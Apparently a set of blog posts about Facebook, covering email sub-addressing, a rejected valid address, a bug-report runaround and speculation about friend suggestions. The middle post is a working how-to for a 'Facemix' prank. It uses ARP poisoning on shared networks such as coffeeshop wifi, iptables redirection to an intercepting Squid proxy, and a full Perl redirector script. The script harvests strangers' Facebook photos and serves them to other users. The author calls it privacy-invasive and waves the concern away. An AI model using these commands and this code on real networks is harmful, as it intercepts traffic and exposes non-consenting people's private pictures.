Friend suggestions

But there may have been more to it than improper validation. One of the many ways Facebook comes up with suggestions running along the lines of “so-and-so is now on facebook, do you know her? let’s connect!” is to entice you to give your password to third-party services (they call this “add friends from your address book”). So suppose you had mary@jane.com in your Gmail address book at that time, and you let Facebook read this address book, then Facebook stores the mary@jane.com address (possibly indefinately) as one of your “friend candidates”.
Some time later, Mary Jane registers a Facebook account, using her mary@jane.com email address – the one that’s also on record as one of your friend candidates. Ping! Facebook sends you a message, enticing you to connect¹.
Of course, this all falls down when Mary registers using a sub-addressed address, e.g., mary+facebook@jane.com. She might want to do this to channel the flood of facebook-originating email into a separate folder. mary+facebook@jane.com is probably not on file with you or anyone else, since if you want to send her an email, you’d send it to mary@jane.com — so that’s what was in your Gmail address book.

Sub-addresses: Bad for business, unless…

That brings me to the following conspiracy theory: Initially, Facebook disallowed sub-addressed email addresses (under the guise of a “broken” validator?) because those interfere with their goal of engaging you with as many people as possible (via friend suggestions), so as to have your eyeballs on their site and in front of their advertisers until they bleed (the eyeballs, not the advertisers).
At a certain moment in the past 28 months, they fixed the improper ‘invalid email address’ designation of sub-addressed accounts. Good for facebookers, bad for business — unless they parse the email address and drop the part between the + and the @. Thing is, sub-addressing is not a standard. On my mailserver, I can specify a character other than + to use as an extension designator. It’s up to the mailserver to do something useful or silly with the sub-addressing. There are no formal semantics. If there is a + in the user-part of an email address, that does not necessarily mean that it is sub-addressed.
My guess is that Facebook made their address matching fuzzy, to account for many possibilities. They’ll plunder your address book and will still figure out that you and Mary Jane are acquainted, no worries.

Tinfoil hat

Well, I do worry.
On the web, your email address is a key to your identity. Your identity is something which many organizations (advertisers, some governments, …) very much like to link across natural domain boundaries. I don’t think that many organizations have updated their address matching algorithms with fuzzyness… yet. So at the moment, it’s still a good idea to sign up to sites and services using unique, subaddressed email accounts. But to be futureproof, you’ll need to defeat fuzzy matchers that take the many forms of sub-addressing into account. It’s probably best to just register a domain and have all email arriving at that domain be delivered to one account. That way, you can easily use any email address at that domain when signing up. If you don’t want to run your own mail server, the one that Google provides you with if you take Google Apps on your domain allows just that. But I’m not so sure that recommendation is solid advice, privacy-wise…

1)Possibly, and hopefully, they do some cross-checking first.

You may not be aware of the fact that any picture on facebook is publicly accessible. Yes, it is. There’s no authentication & authorisation whatsoever. Handling those in a scalable way would ramp up costs. Your privacy is not worth those costs. Contrary to the impression you are trying to deliver through your profile, you are not important. Happy shareholders are important!

Due to this fact I just need to know the URLs of your pictures. From the URL I can determine whether it’s a profile picture, profile picture thumbnail, photo, photo thumbnail, etc.

Wouldn’t it be fun to mix the pictures of the facebook page you are currently viewing with those from facebook pages others are viewing? So when you’re browsing your friend’s albums, you not only see his pictures but pictures from other peoples’ albums too, and vice versa?
The pictures may be requested by the guy across the bar, or by the girl one floor down in the library, or by anyone on the same network as you are — all of you are browsing together with the people in your physical vicinity, sharing whatever pictures you encounter! It’s beyond Facebook. It’s crowdbrowsing. It’s Megafacebook.
While you may not know these newly inserted friends, you might get to. Maybe you bump into one another at the toilets, or at the counter.
“Why is everyone staring at me like that?” you naively wonder. (They’ve seen those pictures).
“Does she know that I know about those pictures of her and her friends? But wait… what might she know about me?”, your paranoid mind ponders.
It’s all about what you think of others and what others think of you. Total absorption. Now that’s what I call social networking. All hail Facebook Social!

Give the wifi crowd at your local coffeeshop the pleasure of learning a little bit more about eachothers lives and friends.

Get to work

You need:

• one network vulnerable to ARP poison routing (that’s most of them) or one network which you already control anyway. Make everyone route their traffic through your machine.
• one installment of the Nginx web server, configured with --with-http_random_index_module. I use the 0.8.3x series.
• one installment of the Squid http proxy server. I use the 3.1 series.
• Perl and LWP::Simple.

Set up Nginx

Create some directories to hold the images:

mkdir /var/www/facemix/{albums,photos,photosthumb,smoelen,smoelenthumb}

Tell Nginx to respond to requests for those directories by randomly serving one of the files in them:

location ~ ^/facemix/([^/]+)(/?.*)$ {
alias /var/www/facemix/$1/$2;
random_index on;
expires -1;
}

You need the ‘expires -1′ to avoid caching. If proxies or user agents were to cache the results, they wouldn’t be very random anymore now would they.

Stick some files in there and test your installation.

Set up Squid

Set up squid in interception mode. If you’re not NATting the routed traffic, set it to run on port 80. If Nginx is already listening on that socket, make Nginx listen on some other port, or localhost only, while running squid on port 80 but only on the external interface.

Set up networking

This is for iptables.

• You’re NATting the pwned hosts. Run something along the lines of
  iptables -t nat -A PREROUTING -i $INTERFACE -p tcp --dport 80 -j REDIRECT --to-port 8080
  to redirect all traffic incoming on $INTERFACE and destined for port 80 to port 8080, which is where you need squid to listen on.
• You’re doing 2-way ARP poisoning (cheers!). Run something along the lines of
  iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j DNAT --to-destination $YOURIP
  Squid needs to run on port 80 on interface with IP $YOURIP.

Check Squid’s logs to verify that requests are intercepted successfully.

Run the redirection script

I don’t touch Perl very often, and cobbling together this script made me remember why that is. It’s very usable as a means of frightening little kids.
In a nutshell, what my redirector script does is

1. determine whether the URL fed to it by Squid is a facebook picture url;
2. if so, and if we don’t have that picture yet, fork off to download it;
3. point Squid to a random picture of the same type (served by Nginx).

I like the forking. I dislike the iffed regexes which could probably be condensed into one but then it wouldn’t be ‘cobbling together’ anymore.

Adjust the variables for your setup and tell Squid about the script (eg url_rewrite_program /usr/local/lib/facemix-squidredir.pl).

The Facebook logo will change to reflect the fact that the users are now browsing facebook in Social! mode.

One further note: This is privacy-invasive. I brush away my moral doubts by stating that anyone who signed away their privacy rights when joining facebook AND AT THE SAME TIME entertains any expectations with respect to privacy,
« inhale »
… is utterly mental and has completely lost any and all sense of proportionality. If you care about privacy, why use a service which lets you view any picture of any user regardless of who you are? Who are you kidding?

If you’re still reading, here’s the script:

#!/usr/bin/perl -w
 
use LWP::Simple;
 
$WEBROOT = 'http://localhost/facemix/';
$WEBDIR = '/var/www/facemix/';
$CHANCE = 5; #One in X requests gets mixed
$SIG{CHLD} = 'IGNORE';
 
$|=1;
while (<>) {
    local @reqfrags = split(/ /, $_);
    local $url = @reqfrags[0];
 
    if    ($url =~ /(^http:\/\/.*.fbcdn.net\/rsrc.php\/z7VU4\/hash\/66ad7upf.png$)/) {
        print "http://smormedia.gavagai.nl/2010/04/FacebookSocial2.png\n";
    }
    elsif    (($url =~ /(^http:\/\/photos-.*.fbcdn.net\/.*\/.*_n.jpg$)/) || ($url =~ /(^http:\/\/photos-.*.fbcdn.net\/.*\/n.*.jpg$)/)) {
        &mixurl('photos/',$url);
    }
    elsif (($url =~ /(^http:\/\/photos-.*.fbcdn.net\/.*\/.*_s.jpg$)/) || ($url =~ /(^http:\/\/photos-.*.fbcdn.net\/.*\/s.*.jpg$)/)) {
        &mixurl('photosthumb/',$url);
    }
    elsif (($url =~ /(^http:\/\/profile.*.fbcdn.net\/.*\/.*_n.jpg$)/) || ($url =~ /(^http:\/\/profile.*.fbcdn.net\/.*\/n.*.jpg$)/)) {
        &mixurl('smoelen/',$url);
    }
    elsif (($url =~ /(^http:\/\/profile.*.fbcdn.net\/.*\/.*_q.jpg$)/) || ($url =~ /(^http:\/\/profile.*.fbcdn.net\/.*\/q.*.jpg$)/)) {
        &mixurl('smoelenthumb/',$url);
    }
    elsif (($url =~ /(^http:\/\/photos-.*.fbcdn.net\/.*\/.*_a.jpg$)/) || ($url =~ /(^http:\/\/photos-.*.fbcdn.net\/.*\/a.*.jpg$)/)) {
        &mixurl('albums/',$url);
    }
 
    else
    {
        print $url."\n";
    }
}
 
sub mixurl {
    #args: subdir, url
    local $vork = fork();
    if ($vork == 0) {&getit($_[0], $_[1]);}
    if (int(rand($CHANCE)) == 0) {
      print $WEBROOT.$_[0]."\n";
    }
    else {
      print $_[1]."\n";
    }
}
 
sub getit {
    #args: subdir, url
    local $storedir = $WEBDIR.$_[0];
    local @urlfrags = split(/\//, $_[1]);
    local $fname = pop(@urlfrags);
    if (!stat($storedir.$fname)) {
      getstore($_[1],$storedir.'._tmp-'.$fname);
      rename($storedir.'._tmp-'.$fname, $storedir.$fname);
    }
    exit;
}

Prelude

Yesterday I decided to register at Facebook. Yes, I know, this is against some of my principles but I don’t think I’ll be making myself popular by being a total nerd each time – I am not going to ask near-strangers to make a special effort when they want to share $pictures_taken_during_certain_event_with_me_in_it with me. I just want to download the pictures to my own album thankyouverymuch, and I need an account for that.

Registering

Well, the form for registering on the facebook homepage looks simple enough. I usually use my gmail-account when signing up to websites, with my accountname suffixed by +some_tag. This is called “sub-addressing” and it’s mighty convenient. Do you have gmail? Try it! If your email address is myaccount@gmail.com, send a message to myaccount+hey-look-a-sub-address@gmail.com. It will pop up in your inbox. You can then use gmail’s filters on the TO:, use your imagination. If you run your own mailserver, you have even more flexibility in what you can do with sub-addressing.
So I put in myaccount+facebook@gmail.com and hit Sign Up. Facebook responds thusly:

Ah right. But IT IS VALID. It’s not the first time I encounter an email address validation function that doesn’t accept valid email addresses. I suppose development of such a validation function goes a bit like this:

DEV#1: “Chief software architect told us to put in an email validation function.”
DEV#2: “Sure! Hmmm, say, what does a valid email address look like anyway?”
DEV#1: “What, do you think there’s a standard on this? Some sort of agreement on what is a valid email address? Ha-ha-ha! Of course not. And I’m a Web Developer® so I’m an expert on email addresses. I’ve seen so many email addresses in my life, I think I’ve seen them all! I’ll just exclude everything that doesn’t look like an email address I’ve ever seen. Presto!”

The standard the devs were looking for is RFC5322. “Do you know what an RFC is” should be the first question on any job interview for a web developer position. Without standards, you’re nowhere on the internet.

File bug report

Being a good geek, I embarked on a quest to point out the existance of RFC5322 to the Facebook folks. On the Help / Sign Up: Bugs and Known Problems page there’s a “I’d like to submit a bug report” link that takes you to a form for submitting signup bugs.

I could not help but try to use my sub-addressed gmail account as a contact address on this bug, but…

How stupid of me. They need a T! I assume they ran out of. By now I’m thinking of chartering a helicopter, flying to Facebook’s headquarters, and dropping really big concrete letter-T’s on them. But then again, they might not see this as humourous. Oh well, on with the show: I use a non-subaddressed account and click Submit.
A couple of hours later I find this gem in my inbox:

From: The Facebook Team <info+du7b7dy@facebook.com>
To: (address removed)
Subject: Re: SIGNUP-BUGS: valid email address is not accepted
Date: Tue, 14 Apr 2009 05:14:20 -0700
Reply-to: The Facebook Team <info+du7b7dy@facebook.com>
Sender: <info+du7b7dy@facebook.com>
X-Mailer: ZuckMail [version 1.00]

Hi,

Please reply to this email to verify that you are the owner of the
account that you referenced in your Facebook support inquiry. This
security step must be completed before Facebook can respond to your
inquiry. We apologize for any inconvenience.

If this email address is not associated with your account, please reply
to this email from an email address that is associated with your Facebook
account, ensuring that this email is in your response (this may require
you to copy and paste this text if your email client removes this email
from your reply).

Look at the Reply-to:, the From: and the Sender:. Is that a subaddressed email address or what? This is getting ridiculous!
More worrisome is them mentioning ‘the account you referenced in your Facebook support enquiry’. At this moment I’m thinking that they might need confirmation of the contact details of the bugreport before looking at it. Of course. Because that’s what it said in the ‘Magical T’ form (see screenshot above). I have to enter an email address, and if I have one that’s associated with a Facebook account I am to use that one. If they would require a facebook account for any bug reports they would do the check before letting me submit any bugs at all, wouldn’t they? But any email address is fine – it says so on the form – AND YOUR FORM IS CALLED “SIGNUP-BUGS”! If I’m filing a bug report because I can’t sign up then, by pure and simple logic , I DO NOT HAVE AN ACCOUNT. Requiring me to create an account so I can contact you about not being able to create an account is INSANE. Anyone not on crack gets this, so I get my hopes up and confirm my email address. It is with great anticipation that I open up the e-mail I get twenty minutes later:

From: The Facebook Team <info+du7b7dy@facebook.com>
Subject: Re: SIGNUP-BUGS: valid email address is not accepted
<snip - ed>

We currently do not have a registration under this email address.

Unfortunately, you will need to go through the sign up process again.
If you experience any further problems or encounter issues logging in,
please visit http://www.facebook.com/help.php?page=746.

Thanks,

The Facebook Team

FACEBOOK PEOPLE SMOKE CRACK

No of course they don’t. They just happen to have a really intricate sense of humour and a really crappy QA process. I tried to help and point these flaws out to them, but for the moment, I’m defeated. And I’m definitely not going to trust Facebook with my data thankyouverymuch.